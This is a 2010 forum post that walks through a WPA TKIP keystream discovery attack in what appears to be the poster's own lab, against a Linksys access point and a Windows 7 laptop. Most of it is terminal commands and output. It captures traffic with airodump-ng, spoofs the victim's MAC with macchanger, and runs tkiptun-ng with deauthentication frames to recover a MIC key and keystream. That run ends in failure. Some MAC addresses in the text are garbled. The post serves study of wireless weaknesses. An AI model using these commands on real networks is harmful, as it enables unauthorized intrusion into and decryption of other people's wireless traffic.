Post Tue Mar 30, 2010 2:04 am

WPA TKIP RC4 keystream discovery attack (For learning purpose)

Victim:
Model: HP 6310b
CPU: Intel(R) Core(TM) Duo CPU P8700 2.53GHz
Memory: 4GB
OS: Windows 7
Wireless Interface: Intel(R) WiFi Link 5100 AGN
WiFi security:WPA2/WPA-Enterprise with EAP-TLS(Smartcard or certificate) authentication, TKIP encryption
MAC address: 00:1E:65:F8:BA:A8

Attacker:
Model: Dell Optiplex GX270
CPU: Intel Pentium 4 2.60 GHz
Memory: 1GB
OS: BT4F
Wireless Cards: Alfa AWUS360H with 7dB omnidirectional antenna(for attackings), Linksys WPC54AG PCMCIA (in promiscous mode)

AP:
Model: Linksys WRT54GL v1.1
Firmware: v4.30.11, Aug. 17, 2007
Wireless security and settings: WPA/WPA2-Enterprise, TKIP/AES+TKIP encryption, QoS/WMM, Key Renewal Interval=900s
BSSID: 00:18:D3:93:FB:A0

Radius server: FreeRADIUS-2.0.2, EAP-TLS authentication with X.509 certificates and DH key exchange

Run airodump-ng for WPA:
root@bt:~# airodump-ng -c 2 -w dump wlan2

CH 2 ][ Elapsed: 16 s ][ 2010-03-29 08:10 ][ WPA handshake: 00:18:D3:93:FB:A0

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:18:D3:93:FB:A0 -44 100 158 202 3 2 54e. WPA TKIP MGT cuckoo
00:1F:33:FF:39:52 -77 0 154 0 0 2 54e. OPN NETGEAR

BSSID STATION PWR Rate Lost Packets Probes

00:18:393:FB:A0 00:1E:65:F8:BA:A8 -30 54e-54e 1 143
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -36 0 - 1 101 125
^C
root@bt:~#

Run airodump-ng for WPA2:
root@bt:~# airodump-ng -c 2 -w dump wlan2

CH 2 ][ Elapsed: 3 mins ][ 2010-03-29 08:24 ][ WPA handshake: 00:18:393:FB:A0

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:18:393:FB:A0 -40 100 1887 4249 0 2 54e. WPA2 CCMP MGT cuckoo
00:1F:33:FF:39:52 -72 0 1833 0 0 2 54e. OPN NETGEAR
00:1E:65:F8:BA:A8 -37 0 0 0 0 113 -1 <length: 0>

BSSID STATION PWR Rate Lost Packets Probes

(not associated) 00:24:8C:57:8F3 -68 0 - 2 0 8
00:18:393:FB:A0 00:1E:65:F8:BA:A8 -29 54e-54e 0 4287 cuckoo
00:1F:33:FF:39:52 00:18:393:FB:A0 -36 1e- 1 0 8
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -37 0 - 1 159 1028
^C

Change attacker's MAC address:
root@bt:~# ifconfig wlan0 down
root@bt:~# macchanger --mac 00:1E:65:F8:BA:A8 wlan0
Current MAC: 00:c0:ca:1b:f8:b7 (Alfa, Inc.)
Faked MAC: 00:1e:65:f8:ba:a8 (unknown)
root@bt:~# ifconfig wlan0 up

Run TKIP keystream discovery attack:
root@bt:~# tkiptun-ng -a 00:18:393:FB:A0 -h 00:1E:65:F8:BA:A8 -m 80 -n 100 wlan0
Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
08:24:01 Michael Test: Successful
08:24:01 Waiting for beacon frame (BSSID: 00:18:393:FB:A0) on channel 2
08:24:01 Found specified AP
08:24:01 WPA handshake: 00:18:393:FB:A0 captured65:F8:BA:A8] [ 6| 3 ACKs]
08:24:01 Sending 4 directed DeAuth. STMAC: [00:1E:65:F8:BA:A8] [ 9| 6 ACKs]
08:24:02 Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-0329-082409.cap
08:24:09 Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-0329-082409.cap
08:24:09 Got the answer!
08:24:09 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.

08:24:31 Offset 81 ( 0% done) | xor = 49 | pt = 40 | 122 frames written in 100055ms
08:25:47 Offset 80 ( 2% done) | xor = 8B | pt = 2A | 155 frames written in 127108ms
08:27:03 Offset 79 ( 4% done) | xor = 39 | pt = 01 | 163 frames written in 133657ms
08:28:18 Offset 78 ( 7% done) | xor = 03 | pt = F4 | 144 frames written in 118079ms
08:29:34 Offset 77 ( 9% done) | xor = EF | pt = 6F | 157 frames written in 128742ms
08:30:42 Offset 76 (11% done) | xor = 76 | pt = 95 | 75 frames written in 61500ms
08:32:01 Offset 75 (14% done) | xor = BA | pt = 67 | 187 frames written in 153338ms
08:33:06 Offset 74 (16% done) | xor = 03 | pt = 14 | 54 frames written in 44279ms
08:34:25 Offset 73 (19% done) | xor = 02 | pt = A4 | 190 frames written in 155801ms
08:35:32 Offset 72 (21% done) | xor = F0 | pt = 3F | 67 frames written in 54943ms
08:36:52 Offset 71 (23% done) | xor = D5 | pt = 93 | 193 frames written in 158255ms
08:38:15 Offset 70 (26% done) | xor = 7D | pt = 1D | 230 frames written in 188622ms
Sleeping for 60 seconds.36 bytes still unknown
ARP Reply
Checking 192.168.x.y
08:38:15 Reversed MIC Key (FromDS): D6:16:91:B7:23:03:E4:25

Saving plaintext in replay_dec-0329-083815.cap
Saving keystream in replay_dec-0329-083815.xor
08:38:15
Completed in 836s (0.05 bytes/s)

08:38:15 AP MAC: 00:18:393:FB:9E IP: 192.168.0.1
08:38:15 Client MAC: 00:1E:65:F8:BA:A8 IP: 192.168.0.103
08:38:15 Sent encrypted tkip ARP request to the client.
08:38:15 Wait for the mic countermeasure timeout of 60 seconds.

Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Sent 1172 packets, current guess: 8F...

Failure: got several deauthentication packets from the AP - you need to start the whole process all over again, as the client got disconnected.

root@bt:~#
Good Luck!

=================
Vertigo
GCIH, Security+
Last edited by Vertigo on Tue Mar 30, 2010 6:34 am, edited 1 time in total.